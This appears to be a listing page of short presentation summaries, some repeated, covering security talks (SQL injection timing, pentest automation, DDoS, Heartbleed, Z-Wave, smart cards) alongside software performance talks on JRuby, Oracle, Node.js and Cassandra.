Presentation by Haroon Meer and Marco Slaviero at BlackHat USA in 2007.
This presentation is about timing attacks against web applications. Squeeza, a SQLi tool developed by Marco Slaviero that returns data through various channels (dns,timing,http error messages) is introduced. An attack called Cross site request timing is also discussed.
A status update on JRuby, covering compatibility, Rails, and next-gen performance numbers. JRuby is currently the fastest way to run Rails apps, and we're doing work to make it even faster in the future.
Rocket Fuelled Cucumbers discusses strategies for dealing with slow cucumber test suites, including:
- Using Spork to preload support code to speed up test runs
- Tagging tests to run focused subsets based on features, filenames, or tags
- Distributing tests across multiple servers using Testjour to parallelize testing
- Looking to cloud providers like EC2 to gain additional hardware resources
- Dividing applications and tests along service boundaries to isolate components
Terracotta is a high performance open source Java clustering technology which includes native support via plug-ins to seamlessly integrate with applications based on Hibernate, EHCache, Spring and more. In this session, learn how to integrate Terracotta into your Hibernate application in just a few simple steps. Then visualize your application in real-time and tune it's performance using the Terracotta developer console, a sophisticated runtime visualization, profiling and debugging tool included with the core Terracotta kit.
This document introduces Solaris DTrace, a dynamic tracing framework for the Solaris operating system. It provides an overview of DTrace architecture and components, how to use DTrace probes and actions, and exercises demonstrating how to use DTrace to troubleshoot system calls, memory allocations, and I/O usage.
Down the Rabbit Hole: An Adventure in JVM WonderlandCharles Nutter
The document discusses exploring interesting Java features and how they are compiled and executed by the JVM. It will look at bytecode, compiler logs, and native code generated for simple Java examples. The goal is to understand hidden performance costs, how code design impacts performance, and what the JVM can and cannot optimize. It begins with a "Hello World" example and examines the bytecode, compiler logs showing inlining, and native assembly code generated by the JIT compiler.
How to run system administrator recruitment process? By creating platform based on open source parts in just 2 nights! I gave this talk in Poland / Kraków OWASP chapter meeting on 17th October 2013 at our local Google for Entrepreneurs site. It's focused on security and also shows how to create recruitment process in CTF / challenge way.
This story covers mostly security details of this whole platform. There's great chance, that I will give another talk about this system but this time focusing on technical details. Stay tuned ;)
A status update on JRuby, covering compatibility, Rails, and next-gen performance numbers. JRuby is currently the fastest way to run Rails apps, and we're doing work to make it even faster in the future.
Rocket Fuelled Cucumbers discusses strategies for dealing with slow cucumber test suites, including:
- Using Spork to preload support code to speed up test runs
- Tagging tests to run focused subsets based on features, filenames, or tags
- Distributing tests across multiple servers using Testjour to parallelize testing
- Looking to cloud providers like EC2 to gain additional hardware resources
- Dividing applications and tests along service boundaries to isolate components
Terracotta is a high performance open source Java clustering technology which includes native support via plug-ins to seamlessly integrate with applications based on Hibernate, EHCache, Spring and more. In this session, learn how to integrate Terracotta into your Hibernate application in just a few simple steps. Then visualize your application in real-time and tune it's performance using the Terracotta developer console, a sophisticated runtime visualization, profiling and debugging tool included with the core Terracotta kit.
This document introduces Solaris DTrace, a dynamic tracing framework for the Solaris operating system. It provides an overview of DTrace architecture and components, how to use DTrace probes and actions, and exercises demonstrating how to use DTrace to troubleshoot system calls, memory allocations, and I/O usage.
Down the Rabbit Hole: An Adventure in JVM WonderlandCharles Nutter
The document discusses exploring interesting Java features and how they are compiled and executed by the JVM. It will look at bytecode, compiler logs, and native code generated for simple Java examples. The goal is to understand hidden performance costs, how code design impacts performance, and what the JVM can and cannot optimize. It begins with a "Hello World" example and examines the bytecode, compiler logs showing inlining, and native assembly code generated by the JIT compiler.
How to run system administrator recruitment process? By creating platform based on open source parts in just 2 nights! I gave this talk in Poland / Kraków OWASP chapter meeting on 17th October 2013 at our local Google for Entrepreneurs site. It's focused on security and also shows how to create recruitment process in CTF / challenge way.
This story covers mostly security details of this whole platform. There's great chance, that I will give another talk about this system but this time focusing on technical details. Stay tuned ;)
This document discusses the automation of penetration testing and vulnerability assessments. It introduces BiDiBLAH, a tool created by SensePost to automate parts of their assessment methodology. The document outlines which steps of the methodology can be easily automated by BiDiBLAH, such as footprinting, fingerprinting, targeting, vulnerability discovery with Nessus, and exploitation with Metasploit. More challenging areas for automation include steps with exceptions or non-standard processes. The document demonstrates BiDiBLAH performing automated tasks and discusses considerations for releasing the tool to balance security and usability.
This document summarizes security threats to machine clouds based on cursory testing of a machine cloud system. It finds that machine clouds are vulnerable due to exposed administrative interfaces, issues in the content management system layer like cross-site scripting, lack of transport layer encryption, and the ability for rogue machines to connect and execute malicious payloads. The growth of connected devices and their management via web-based interfaces introduces threats beyond traditional web applications. Proper security measures are needed to protect the integrity of machine clouds and the systems they connect.
Putting the tea back into cyber terrorismSensePost
Presentation by Charl van der Walt, Roelof Temmingh and Haroon Meer at BlackHat USA 2003.
This presentation is about targeted, effective, automated attacks that could be used in countrywide cyberterrorism. A worm that targets internal networks is discussed as an example of such an attack.
A new look into web application reconnaissance SensePost
Presentation by Jurgens van der Merwe at ZaCon 2 in 2010.
This presentation is about Selenium, a browser automation framework and its applications in web reconnaissance. Examples of using Selenium with facebook are discussed.
This document is an agenda for a talk about Web 2.0 security woes. The talk will discuss how Web 2.0 applications have changed some threats and vulnerabilities compared to previous generations of web applications. While some threats have changed form, many of the same types of vulnerabilities still exist. The talk will provide examples of cross-site scripting and hidden functionality vulnerabilities. It will also discuss steps that development teams and customers can take to help improve security, such as training, secure coding practices, and involvement of security personnel throughout the development life cycle.
Presentation by Charl van der Walt at INFO SEC Africa 2001.
The presentation begins with a case study of a DoS attack launched on a number of high profile sites by the canadian teen "Mafiaboy". An explanation of DoS and DDoS given. The impact of DDoS in South Africa is also discussed. The presentation ends with a series of discussions on DDoS countermeasures.
Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.
The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.
Presentation by Dominic White at the ITweb security summit 2010.
This presentation is about online privacy. The presentation begins with a discussion on behavioral tracking, Ways to prevent tracking such as DNT, TPL,googleSharing and opt out are discussed. The presentation ends with a series of disclussions on evercookie and nevercookie.
Presentation by Marco Slaviero at the University of Pretoria to their masters class of 2008.
This presentation is an introduction to information security. The presentation starts with a look at the past and current state of network security. Penetration testing is discussed. SQL injection and XSS demonstrations are given
Multithreading and Parallelism on iOS [MobOS 2013]Kuba Břečka
This document summarizes an overview of parallelism and multithreading on iOS. It covers key topics like parallelism terminology, why parallelization is important, and how it can be achieved through multiple processes, threads, high-level abstractions like Grand Central Dispatch and operation queues, and instruction-level parallelism. It also discusses challenges like race conditions and synchronization issues that must be addressed with techniques like locks and mutexes when working with threads.
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1Tanel Poder
The document describes troubleshooting a complex performance issue in an Oracle database. Key details:
- The problem was sporadic extreme slowness of the Oracle database and server lasting 1-20 minutes.
- Initial AWR reports and OS metrics showed a spike at 18:10 with CPU usage at 66.89%, confirming a problem occurred then.
- Further investigation using additional metrics was needed to fully understand the root cause, as initial diagnostics did not provide enough context about this brief problem period.
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
Rodrigo Albani de Campos gave a presentation on capacity planning at the São Paulo Perl Workshop. He discussed typical performance metrics like load average and CPU usage, but emphasized that time series data alone is not sufficient for capacity planning. He covered concepts like arrival rate, service time, and queues. De Campos demonstrated using the PDQ queuing model tool to model an Apache web server and explore "what if" scenarios. He provided several references for further reading on performance analysis and capacity planning techniques.
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...srisatish ambati
Top 10 Causes for Java Issues in Production and What to Do When Things Go Wrong
JavaOne 2010.
Abstract: It's Friday evening and you hear the first rumble . . . one java node has become slightly unresponsive. You lookup the process, get a thread dump, and for good measure restart it at 8 p.m. Saturday afternoon is when you realize that other nodes have caught the flu and you get the ugly call from the customer. In a matter of hours, you're on that conference bridge with support groups of different packages and Java vendors and one of your uberarchitects. Yes, production instances are up and down, and restarting like there's no tomorrow. Here's an accumulated compendium of the op 10 things that can cause Java production heartburn and what to do when your Java production is on fire. And yes, please have your tools belt on.
Speaker(s):
Cliff Click, Azul Systems, Distinguished Engineer
SriSatish Ambati, Azul Systems, Performance Engineer
The document summarizes Thomas Kyte's presentation at the Hotsos 2011 conference. The presentation covered several topics including: learning about speakers like Gary Goodman and Doug Burns, the importance of queueing and resource management, differences in perspectives, and the benefits of simple techniques like array fetching and bulk processing. Kyte emphasized doing the math to understand performance issues and using statistics to optimize queries.
The document discusses concurrency and scaling applications using Gevent. It provides examples of applications that require concurrency like web servers and SSH servers. It then discusses using multiprocessing to handle concurrency by spawning worker processes. This approach has limitations in terms of concurrency and memory usage. Gevent provides a more lightweight approach using greenlets that allow handling multiple IO operations concurrently within a single process. It achieves this using an event loop and monkey patching blocking calls. This allows building highly concurrent applications that can handle thousands of connections without memory overhead of processes.
This document discusses optimizing JavaScript performance in Node.js. It covers benchmarking Node applications, tips for writing efficient JavaScript that avoids hidden classes and dictionary mode in the V8 engine, profiling Node to find hot spots, and how the V8 optimizing compiler works. The presenter emphasizes the importance of speed and provides resources for further optimizing Node applications.
Tom Conley presented on enabling SSL encryption for TN3270 traffic to prevent passwords from traversing internal networks in clear text. Setting up SSL with a self-signed certificate takes about 10 minutes. Ed Jaffe discussed improvements to Hardware Management Console interfaces since 1994 that provide easier navigation and topology views. Sam Knutson provided an overview of the Hercules mainframe emulator and Turnkey MVS 3.8j system that can be run within Hercules to gain experience with vintage MVS. Skip Robinson described issues encountered when migrating system automation from R13 to z/OS 2.1 due to changes in NetView and subsystem definitions.
This document discusses how visualization can help make IT security possible when dealing with large scale infrastructure. It describes some common security tools like antivirus software, firewalls, and intrusion detection systems that are used but have limitations. The document then introduces parallel coordinate visualization as a tool that can help analyze large volumes of log and event data to help detect unknown attacks and behaviors. It provides examples of how parallel coordinates could be used to visualize and analyze squid proxy logs, Apache logs, and OpenVPN tunnels. The conclusion is that traditional visualization often fails at scale but parallel coordinates enables analyzing large datasets to find the unknown and understand logs better.
Php johannesburg meetup - talk 2014 - scaling php in the enterpriseSarel van der Walt
This document discusses scaling PHP applications for enterprise environments. It provides tips on optimizing various aspects of PHP applications and infrastructure to improve scalability. These include optimizing databases, caching, background tasks, frameworks, monitoring, and more. Specific technologies and strategies mentioned include Redis, memcached, haproxy, MySQL optimization techniques like archiving, and moving work to the client side where possible using techniques like AngularJS.
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsМохачёк Сахер
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits is a walkthrough through breaking IonCUBE's DRM protection scheme to allow researches in decompiling and analyzing Exploit Kits protected with such protection.
This document discusses the automation of penetration testing and vulnerability assessments. It introduces BiDiBLAH, a tool created by SensePost to automate parts of their assessment methodology. The document outlines which steps of the methodology can be easily automated by BiDiBLAH, such as footprinting, fingerprinting, targeting, vulnerability discovery with Nessus, and exploitation with Metasploit. More challenging areas for automation include steps with exceptions or non-standard processes. The document demonstrates BiDiBLAH performing automated tasks and discusses considerations for releasing the tool to balance security and usability.
This document summarizes security threats to machine clouds based on cursory testing of a machine cloud system. It finds that machine clouds are vulnerable due to exposed administrative interfaces, issues in the content management system layer like cross-site scripting, lack of transport layer encryption, and the ability for rogue machines to connect and execute malicious payloads. The growth of connected devices and their management via web-based interfaces introduces threats beyond traditional web applications. Proper security measures are needed to protect the integrity of machine clouds and the systems they connect.
Putting the tea back into cyber terrorismSensePost
Presentation by Charl van der Walt, Roelof Temmingh and Haroon Meer at BlackHat USA 2003.
This presentation is about targeted, effective, automated attacks that could be used in countrywide cyberterrorism. A worm that targets internal networks is discussed as an example of such an attack.
A new look into web application reconnaissance SensePost
Presentation by Jurgens van der Merwe at ZaCon 2 in 2010.
This presentation is about Selenium, a browser automation framework and its applications in web reconnaissance. Examples of using Selenium with facebook are discussed.
This document is an agenda for a talk about Web 2.0 security woes. The talk will discuss how Web 2.0 applications have changed some threats and vulnerabilities compared to previous generations of web applications. While some threats have changed form, many of the same types of vulnerabilities still exist. The talk will provide examples of cross-site scripting and hidden functionality vulnerabilities. It will also discuss steps that development teams and customers can take to help improve security, such as training, secure coding practices, and involvement of security personnel throughout the development life cycle.
Presentation by Charl van der Walt at INFO SEC Africa 2001.
The presentation begins with a case study of a DoS attack launched on a number of high profile sites by the canadian teen "Mafiaboy". An explanation of DoS and DDoS given. The impact of DDoS in South Africa is also discussed. The presentation ends with a series of discussions on DDoS countermeasures.
Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.
The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.
Presentation by Dominic White at the ITweb security summit 2010.
This presentation is about online privacy. The presentation begins with a discussion on behavioral tracking, Ways to prevent tracking such as DNT, TPL,googleSharing and opt out are discussed. The presentation ends with a series of disclussions on evercookie and nevercookie.
Presentation by Marco Slaviero at the University of Pretoria to their masters class of 2008.
This presentation is an introduction to information security. The presentation starts with a look at the past and current state of network security. Penetration testing is discussed. SQL injection and XSS demonstrations are given
Multithreading and Parallelism on iOS [MobOS 2013]Kuba Břečka
This document summarizes an overview of parallelism and multithreading on iOS. It covers key topics like parallelism terminology, why parallelization is important, and how it can be achieved through multiple processes, threads, high-level abstractions like Grand Central Dispatch and operation queues, and instruction-level parallelism. It also discusses challenges like race conditions and synchronization issues that must be addressed with techniques like locks and mutexes when working with threads.
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1Tanel Poder
The document describes troubleshooting a complex performance issue in an Oracle database. Key details:
- The problem was sporadic extreme slowness of the Oracle database and server lasting 1-20 minutes.
- Initial AWR reports and OS metrics showed a spike at 18:10 with CPU usage at 66.89%, confirming a problem occurred then.
- Further investigation using additional metrics was needed to fully understand the root cause, as initial diagnostics did not provide enough context about this brief problem period.
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
Rodrigo Albani de Campos gave a presentation on capacity planning at the São Paulo Perl Workshop. He discussed typical performance metrics like load average and CPU usage, but emphasized that time series data alone is not sufficient for capacity planning. He covered concepts like arrival rate, service time, and queues. De Campos demonstrated using the PDQ queuing model tool to model an Apache web server and explore "what if" scenarios. He provided several references for further reading on performance analysis and capacity planning techniques.
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...srisatish ambati
Top 10 Causes for Java Issues in Production and What to Do When Things Go Wrong
JavaOne 2010.
Abstract: It's Friday evening and you hear the first rumble . . . one java node has become slightly unresponsive. You lookup the process, get a thread dump, and for good measure restart it at 8 p.m. Saturday afternoon is when you realize that other nodes have caught the flu and you get the ugly call from the customer. In a matter of hours, you're on that conference bridge with support groups of different packages and Java vendors and one of your uberarchitects. Yes, production instances are up and down, and restarting like there's no tomorrow. Here's an accumulated compendium of the op 10 things that can cause Java production heartburn and what to do when your Java production is on fire. And yes, please have your tools belt on.
Speaker(s):
Cliff Click, Azul Systems, Distinguished Engineer
SriSatish Ambati, Azul Systems, Performance Engineer
The document summarizes Thomas Kyte's presentation at the Hotsos 2011 conference. The presentation covered several topics including: learning about speakers like Gary Goodman and Doug Burns, the importance of queueing and resource management, differences in perspectives, and the benefits of simple techniques like array fetching and bulk processing. Kyte emphasized doing the math to understand performance issues and using statistics to optimize queries.
The document discusses concurrency and scaling applications using Gevent. It provides examples of applications that require concurrency like web servers and SSH servers. It then discusses using multiprocessing to handle concurrency by spawning worker processes. This approach has limitations in terms of concurrency and memory usage. Gevent provides a more lightweight approach using greenlets that allow handling multiple IO operations concurrently within a single process. It achieves this using an event loop and monkey patching blocking calls. This allows building highly concurrent applications that can handle thousands of connections without memory overhead of processes.
This document discusses optimizing JavaScript performance in Node.js. It covers benchmarking Node applications, tips for writing efficient JavaScript that avoids hidden classes and dictionary mode in the V8 engine, profiling Node to find hot spots, and how the V8 optimizing compiler works. The presenter emphasizes the importance of speed and provides resources for further optimizing Node applications.
Tom Conley presented on enabling SSL encryption for TN3270 traffic to prevent passwords from traversing internal networks in clear text. Setting up SSL with a self-signed certificate takes about 10 minutes. Ed Jaffe discussed improvements to Hardware Management Console interfaces since 1994 that provide easier navigation and topology views. Sam Knutson provided an overview of the Hercules mainframe emulator and Turnkey MVS 3.8j system that can be run within Hercules to gain experience with vintage MVS. Skip Robinson described issues encountered when migrating system automation from R13 to z/OS 2.1 due to changes in NetView and subsystem definitions.
This document discusses how visualization can help make IT security possible when dealing with large scale infrastructure. It describes some common security tools like antivirus software, firewalls, and intrusion detection systems that are used but have limitations. The document then introduces parallel coordinate visualization as a tool that can help analyze large volumes of log and event data to help detect unknown attacks and behaviors. It provides examples of how parallel coordinates could be used to visualize and analyze squid proxy logs, Apache logs, and OpenVPN tunnels. The conclusion is that traditional visualization often fails at scale but parallel coordinates enables analyzing large datasets to find the unknown and understand logs better.
Php johannesburg meetup - talk 2014 - scaling php in the enterpriseSarel van der Walt
This document discusses scaling PHP applications for enterprise environments. It provides tips on optimizing various aspects of PHP applications and infrastructure to improve scalability. These include optimizing databases, caching, background tasks, frameworks, monitoring, and more. Specific technologies and strategies mentioned include Redis, memcached, haproxy, MySQL optimization techniques like archiving, and moving work to the client side where possible using techniques like AngularJS.
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsМохачёк Сахер
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits is a walkthrough through breaking IonCUBE's DRM protection scheme to allow researches in decompiling and analyzing Exploit Kits protected with such protection.
The document discusses concurrency and scaling applications using Gevent. It provides examples of applications that require concurrency like web servers and SSH servers. It then discusses using multiprocessing to handle concurrency by spawning worker processes. This limits scalability due to memory usage and scheduling overhead. Gevent provides a more scalable alternative using greenlets that allow handling blocking operations asynchronously in a single process. It monkey patches Python sockets to make blocking calls non-blocking. This allows scaling to more concurrent connections without the overhead of processes.
The document describes a workshop on Xilinx Vivado High Level Synthesis (HLS) tools held at NECST. The agenda includes an introduction to hardware design flow, the Vivado HLS design flow, kernel creation and optimization, and a hands-on example of implementing a vector addition using Vivado HLS. The example takes the participants through various implementation versions to optimize the kernel by applying directives for loop pipelining, array partitioning, and memory optimizations.
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...DataStax
Go90 is a mobile entertainment platform offering access to live and on demand videos. We built the web services platform and social features like activity feed for go90 by making heavy use of Cassandra and Scala, and would like to share what we learned during development and while operating go90. In this presentation, we cover our data model evolution from the initial prototypes to the current production version and the significant performance gain by using a better data model. We will explain how we apply time series data modeling and the benefits of using expiring columns with DateTieredCompactionStrategy. We will also talk about interesting experiences related to table modifications, tombstones and table pagination. On the operations side, we will discuss our findings on java driver usage, performance, monitoring, cluster maintenance, version upgrade, 2-way ssl and many more. We hope you can learn from our mistakes instead of making them yourself!
About the Speakers
Christopher Webster Software Engineer, AOL
Christopher Webster works on the web services platform for the go90 AOL project. Previously he was a Computer Scientist for the Mission Control Technologies project at NASA Ames Center. Chris worked as a senior staff engineer at Sun Microsystems for Project zembly, the cloud development and deployment environment as well as technical lead in many NetBeans projects. Chris is an author of the NetBeans Field Guide and Assemble the Social Web With Zembly.
Thomas Ng Software Engineer, AOL
Thomas Ng is a software engineer at AOL, building web services for the go90 mobile entertainment platform using Cassandra, Scala and Kafka.
The document discusses load testing and why it often fails. It recommends using a tool with the lowest barrier to entry, such as Blitz, which allows load testing on AWS with a web form or API. Blitz produces results but no reports, so the document shows how to modify Blitz's code to output JSON results for reporting purposes. It encourages integrating load testing into existing development workflows rather than treating it separately after deployment.
"WTF is Twisted? (or; owl amongst the ponies)" is a talk that introduces the Twisted asynchronous programming framework, how it works, and what uses it.
The document describes the process of implementing SMP support for OpenBSD on a SGI Octane 2 machine. Key steps included restructuring per-processor data, implementing locking primitives, handling hardware aspects like spinning up secondary processors, and debugging challenges like detecting deadlocks. Debugging was made difficult by timing issues but was aided by tools like JTAG, DDB, printfs, and modifying locks to record stuck locations. Interrupts could block inter-processor communication so the clock handler was modified to re-enable interrupts during locking.
This document discusses using Ruby for distributed storage systems. It describes components like Bigdam, which is Treasure Data's new data ingestion pipeline. Bigdam uses microservices and a distributed key-value store called Bigdam-pool to buffer data. The document discusses designing and testing Bigdam using mocking, interfaces, and integration tests in Ruby. It also explores porting Bigdam-pool from Java to Ruby and investigating Ruby's suitability for tasks like asynchronous I/O, threading, and serialization/deserialization.
This document summarizes a presentation about Objection, a Python framework that bundles Frida scripts to enable runtime mobile exploration on iOS and Android without needing a jailbroken or rooted device. It includes demos of using Objection to bypass jailbreak detection, extract data from NSUserDefaults, explore the filesystem, bypass SSL pinning, and monitor class methods. Objection aims to make Frida easier to use on mobile by compiling scripts and bundling common functionality.
Vulnerabilities in TN3270 based ApplicationSensePost
A talk given at Hack in the Box Amsterdam and later DerbyCon in 2014 about a new class of vulnerabilities in TN3270 exposed applications by @singe (Dominic White). A video of the talk is available at https://www.youtube.com/watch?v=3HFiv7NvWrM and code can be found at https://github.com/sensepost
Improvement in Rogue Access Points - SensePost Defcon 22SensePost
A supporting slide deck for SensePost's Defcon 22 talk. It contains more useful written information, that the picture heavy version we presented at the conference. You can see the conference video at https://www.youtube.com/watch?v=i2-jReLBSVk and can get the code at https://github.com/sensepost/mana
This document summarizes the Heartbleed vulnerability that was announced in April 2014. It allowed attackers to read portions of a server's memory and extract private keys and user cookies. The vulnerability was in OpenSSL and affected many major companies. It was possible due to a buffer over-read in the OpenSSL implementation of the TLS Heartbeat Extension. While initially many were vulnerable, within a month most major sites and services had patched the vulnerability. The event highlighted issues with OpenSSL's code quality and maintenance and increased funding to address these issues. It also demonstrated the need for rapid patching of 0-day vulnerabilities and the importance of defense in depth strategies.
Botconf 2013 - DNS-based Botnet C2 Server DetectionSensePost
This document discusses using spatial statistics and machine learning classifiers to detect botnet command and control (C2) servers through DNS lookups. It aims to accurately detect botnet traffic with no prior knowledge, being lightweight, fast, and adaptable. The document examines using spatial measures like nearest neighbors analysis and Moran's and Geary's indices on the locations of IP addresses for DNS lookups. This is used to train classifiers to distinguish between benign and fast-flux botnet domains. The classifiers achieved over 95% accuracy and were shown to have minimal performance impact when processing 20,000 domains in under 13 seconds.
Home automation systems provide a centralized control and monitoring function for heating, ventilation and air conditioning (HVAC), lighting and physical security systems. The central control panel and various household devices such as security sensors and alarm systems are connected with each other to form a mesh network over wireless or wired communication links and act as a “smart home”. As you arrive home, the system can automatically open the garage door, unlock the front door and disable the alarm, light the downstairs, and turn on the TV. According to a study by the consulting firm AMA Research, in 2011, the UK home automation market was worth around £65 million with 12% increase on the previous year. The total number of home automation system installations in the UK is estimated to be 189000 by now. The home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.
Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels. Unlike Zigbee, no public security research on Z-Wave protocol was available before our work. Z-wave protocol was only mentioned once during a DefCon 2011 talk when the presenter pointed the possibility of capturing the AES key exchange phase without a demonstration.
The Z-Wave protocol is gaining momentum against the Zigbee protocol with regards to home automation. This is partly due to a faster, and somewhat simpler, development process. Another benefit is that it is less subjected to signal interference compared to the Zigbee protocol, which operates on the widely populated 2.4 GHz band shared by both Bluetooth and Wi-Fi devices.
Z-wave chips have 128-bit AES crypto engines, which are used by access control systems, such as door locks, for authenticated packet encryption. An open source implementation of the Z-wave protocol stack, openzwave , is available but it does not support the encryption part as of yet. Our talk will show how the Z-Wave protocol can be subjected to attacks.
This document discusses common defensive strategies and how attackers bypass them. It notes that while best practices like passwords, patching, and anti-virus are important, they also introduce commonalities that attackers learn to exploit. The document recommends that defenders study attack techniques to prioritize risks and design defenses that differentiate from standard approaches in order to limit widespread exploitation.
This document discusses smart card security and summarizes research into vulnerabilities in the .NET smart card platform. It provides an overview of smart card applications and operating systems, then discusses attacks against smart cards that have been reported in the news. The document focuses on analyzing the security of .NET smart cards, including how the HiveMod tool was created to aid vulnerability research by allowing visualization and manipulation of .NET smart card binaries. It demonstrates how the tool could be used to spoof a digital signature and bypass the application firewall as a proof of concept attack. Responses from vendors are presented, and the conclusion discusses remaining security challenges but also potential for patching vulnerabilities.
Presentation by Grorg Christian Pranschkle at ZaCon 2 in 2010.
This presentation is about SNMP security The presentation begins with an overview of SNMP. SNMP security weaknesses and SNMP security in cisco apps are discussed. Frisk-0 a tool for SNMP Hacking developed by the presenter is also discussed.
Presentation by Jaco van Gaan at IIA in 2001.
This presentation is about the use of ethical hackers in business. The presentation begins with a series of discussions about hackers, what they do, how they do it and the different types of hackers.
Presentation by Haroon Meer at ReCon in 2005.
This presentation is about web application security. Various web application attacks like XSS, SQLi and directory traversal are discussed. The wikto and crowbar tools developed by sensepost are also discussed.
Major global information security trends - a summarySensePost
Presentation by Luc de Graeve at internetix in 2004.
This presentation is a summery of global information security trends in the business environment .The presentation begins with an introduction to major global trends. Legal Issues, threats, technologies and solutions are discussed
Presentation by Charl der Walt and Francesco Geremla at The ITweb security summit in 2009.
This presentation is about the methodology behind version 2 of Sensepost's threat modeling tool, the corporate threat modeller.
Presentaion by Charl van der Walt at the ITweb security summit 2010.
This presentation is an introduction to the security summit 2010. It introduces all the speakers.
Presentation by Charl de Walt in 2001.
The presentation aims to educate people that IT security is relevant to SA business. The presentation begins with examples of defaced SA company websites. Various attacks such as DDoS and semantic attacks are discussed. The presentation ends with a discussion on IP manipulation
Presentation by Luc de Graeve at the Gordon institute of business science in 2001.
This presentation is about security in e-commerce and is aimed at making people aware of what hackers do, how they do it and the financial implications of their actions. The presentation begins with a few examples of defaced websites and ends with a discussion on risk and assessment.
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...Fwdays
Direct losses from downtime in 1 minute = $5-$10 thousand dollars. Reputation is priceless.
As part of the talk, we will consider the architectural strategies necessary for the development of highly loaded fintech solutions. We will focus on using queues and streaming to efficiently work and manage large amounts of data in real-time and to minimize latency.
We will focus special attention on the architectural patterns used in the design of the fintech system, microservices and event-driven architecture, which ensure scalability, fault tolerance, and consistency of the entire system.
The Microsoft 365 Migration Tutorial For Beginner.pptxoperationspcvita
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Keywords: AI, Containeres, Kubernetes, Cloud Native
Event Link: https://meine.doag.org/events/cloudland/2024/agenda/#agendaId.4211
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...AlexanderRichford
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation Functions to Prevent Interaction with Malicious QR Codes.
Aim of the Study: The goal of this research was to develop a robust hybrid approach for identifying malicious and insecure URLs derived from QR codes, ensuring safe interactions.
This is achieved through:
Machine Learning Model: Predicts the likelihood of a URL being malicious.
Security Validation Functions: Ensures the derived URL has a valid certificate and proper URL format.
This innovative blend of technology aims to enhance cybersecurity measures and protect users from potential threats hidden within QR codes 🖥 🔒
This study was my first introduction to using ML which has shown me the immense potential of ML in creating more secure digital environments!
